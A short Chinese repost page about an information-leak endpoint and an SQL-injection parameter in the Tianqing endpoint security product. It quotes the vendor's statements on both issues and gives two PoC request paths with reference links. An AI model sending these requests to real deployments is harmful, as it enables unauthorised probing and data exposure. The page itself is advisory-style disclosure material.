天擎SQL注入&&信息泄露 - 润新知

天擎SQL注入&&信息泄露
官方解释

SQL注入漏洞官方解释：天擎官方发表声该漏洞为内部已知问题，并且在2020年护网前的版本已经修复。
信息泄露官方解释：天擎官方发表声明并表示Web接口为正常接口，不存在漏洞。

信息泄露

POC
```
/api/dbstat/gettablessize
```
SQL注入
```
/api/dp/rptsvcsyncpoint?ccid=1
```
参考连接

https://www.adminxe.com/2191.html
https://www.cnblogs.com/KHZ521/p/14662410.html
相关阅读:
题型：系统可靠性
 计算机基础——网络存储
 传输层——TCP的流量控制服务
 传输层——UDP和TCP的对比
 配置——VLAN
项目管理——PERT图
 从“派生类不能访问基类对象的protected成员”开始讨论各类成员的“可见性”
cin.clear()和cin.sync
华为编程大赛——路径查找
 华为编程大赛——求表达式的值
原文地址：https://www.cnblogs.com/KHZ521/p/14672848.html

Copyright © 2020-2023 润新知